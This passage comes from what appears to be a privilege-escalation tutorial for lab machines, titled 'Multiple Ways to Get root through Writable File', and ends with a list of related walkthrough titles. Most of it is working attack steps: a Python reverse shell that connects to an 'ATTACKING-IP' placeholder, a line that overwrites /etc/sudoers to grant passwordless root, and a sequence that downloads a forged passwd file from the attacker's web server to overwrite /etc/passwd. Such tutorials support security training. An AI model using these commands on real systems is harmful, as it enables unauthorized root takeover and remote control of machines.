After some time it will set SUID permission for /bin/dash and when you will run it will give root access.

/bin/dash

whoami

As you can confirm this from given below image

3^rd Method

In this method we have pasted python reverse shell connection code at place of rm -r /tmp/*and start netcat listener in a new terminal.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And as said above after some time we got the reverse connection through netcat and root access.

nc -lvp 1234

whoami

As you can confirm this from given below image.

4^th Method

Another most interesting method is to give sudo right to the logged users by making him suoders file member. If you will notice below image then you can ensure that currently usre: wernerbrandes may not run sudo command.

Similarly you can also replace“rm -r /tmp/*” from following line as given below.

os.system(‘echo “wernerbrandes ALL=(ALL) NOPASSWD: ALL” > /etc/sudoers’)

And after some time, when you will type “sudo -l” command then you will notice, it becomes the member of sudo users. To take root access type “sudo bash” and enjoy the root access.

sudo -l

sudo bash

5^th Method

As we all know how much important role play by passwd in any linux -like system and if an attacker gets chance to modify this file, it becomes a dynamic way of privilege escalation.

Similarly, we will try something like this BUT with help of the writable script, here by using cat command we can etc/passwd file.

Here you can observe the highlighted entry for user: nemo records, as per my guessing UID:1000 & GID:1000 indicates it would be a member of admin group.

However, we want to edit nemo record to make him a member of root, therefore, select the whole content of etc/passwd and copy it and then paste into empty text file.

After then in a new terminal generate a salt password with help of openssl as shown and copy it.

openssl passwd -1 -salt abc 123

Now paste above-copied salt password at the place of "X" in the record entry of user nemo and also change previous UID&GID with 0:0as shown in the given image. Once above said all steps are completed save the text file as “passwd" because when you will transfer this file to victim's machine it will overwrite the content of original passwd file.

cd Desktop

python -m SimpleHTTPServer 80

Now taking advantage of writable script replace“rm -r /tmp/*” from the following line as given below.

os.system(‘chmod u+s /bin/cp)

After some time it will enable SUID bit for /bin/cp to copy any file.

Now download your modified passwd file inside /tmp directory of victim's machine. Let’s check whether SUID bit gets enabled for /bin/cp or not with help of the following command after then copy modify passwd file into /etc/passwd with help of cp command which will overwrite the content of original passwd file.

cd /tmp

wget http://192.168.1.103/passwd

ls -al /bin/cp

cp passwd /etc/passwd

Now let confirm whether we have successfully manipulated the content of passwd file or not with help of the following command.

tail /etc/passwd

Wonderful!!! You can observe the following changes has now become the part of passwd file.

Now let take root access by executing following command:

su nemo

password 123

whoami

So today we have demonstrated how an attacker can lead to privilege escalation through the writable file.

Hack the Box Challenge Lazy Walkthrough

Hack the Box Challenge Kotarak Walkthrough

Hack the Box Challenge Bashed Walkthrough

Hack the Box Challenge: Inception Walkthrough

Hack the Box Challenge: Tally Walkthrough

Privilege Escalation in Linux using etc/passwd file

Capture NTLM Hashes using PDF (Bad-Pdf)

Linux Privilege Escalation using SUID Binaries

Hack the Box Challenge: Fluxcapacitor Walkthrough

Hack the Trollcave VM (Boot to Root)

Hack the Box Challenge: Jeeves Walkthrough

Linux Privilege Escalation using Exploiting Sudo Rights

Linux Privilege Escalation using Misconfigured NSF

Linux Privilege Escalation Using PATH Variable

Beginner Guide John the Ripper (Part 1)

Working of Traceroute using Wireshark

Hack the Box Challenge: Crimestoppers Walkthrough

Beginners Guide for John the Ripper (Part 2)

Penetration Testing on X11 Server

Multiple Ways to Get root through Writable File